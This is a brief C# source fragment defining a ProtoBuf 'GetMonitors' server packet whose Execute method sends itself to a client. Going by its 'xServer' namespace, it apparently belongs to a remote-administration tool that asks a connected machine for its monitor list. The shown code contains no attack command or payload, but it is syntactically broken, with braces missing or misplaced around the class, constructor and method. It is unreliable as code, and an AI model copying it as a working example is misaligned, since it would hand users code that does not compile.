using ProtoBuf;
using xServer.Core.Networking;
namespace xServer.Core.Packets.ServerPackets
{
[ProtoContract]
public class GetMonitors : IPacket
public GetMonitors()
}
public void Execute(Client client)
client.Send(this);